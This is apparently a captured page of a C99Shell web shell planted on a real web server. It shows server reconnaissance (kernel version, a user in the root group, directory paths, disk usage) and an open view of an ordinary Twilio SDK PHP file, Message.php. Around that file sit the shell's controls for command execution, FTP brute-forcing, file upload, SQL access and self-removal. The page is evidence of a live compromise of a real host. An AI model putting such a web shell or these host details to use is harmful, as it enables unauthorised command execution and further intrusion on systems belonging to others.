!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/sms.picotech.app/public_html/vendor/twilio/sdk/src/Twilio/TwiML/Messaging/   drwxrwxr-x
Free 28.64 GB of 117.98 GB (24.28%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     Message.php (2.01 KB)      -rw-rw-r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

/**
 * This code was generated by
 * \ / _    _  _|   _  _
 * | (_)\/(_)(_|\/| |(/_  v1.0.0
 * /       /
 */

namespace Twilio\TwiML\Messaging;

use 
Twilio\TwiML\TwiML;

class 
Message extends TwiML {
    
/**
     * Message constructor.
     *
     * @param string $body Message Body
     * @param array $attributes Optional attributes
     */
    
public function __construct($body$attributes = []) {
        
parent::__construct('Message'$body$attributes);
    }

    
/**
     * Add Body child.
     *
     * @param string $message Message Body
     * @return Body Child element.
     */
    
public function body($message): Body {
        return 
$this->nest(new Body($message));
    }

    
/**
     * Add Media child.
     *
     * @param string $url Media URL
     * @return Media Child element.
     */
    
public function media($url): Media {
        return 
$this->nest(new Media($url));
    }

    
/**
     * Add To attribute.
     *
     * @param string $to Phone Number to send Message to
     */
    
public function setTo($to): self {
        return 
$this->setAttribute('to'$to);
    }

    
/**
     * Add From attribute.
     *
     * @param string $from Phone Number to send Message from
     */
    
public function setFrom($from): self {
        return 
$this->setAttribute('from'$from);
    }

    
/**
     * Add Action attribute.
     *
     * @param string $action Action URL
     */
    
public function setAction($action): self {
        return 
$this->setAttribute('action'$action);
    }

    
/**
     * Add Method attribute.
     *
     * @param string $method Action URL Method
     */
    
public function setMethod($method): self {
        return 
$this->setAttribute('method'$method);
    }

    
/**
     * Add StatusCallback attribute.
     *
     * @param string $statusCallback Status callback URL. Deprecated in favor of
     *                               action.
     */
    
public function setStatusCallback($statusCallback): self {
        return 
$this->setAttribute('statusCallback'$statusCallback);
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.005 ]--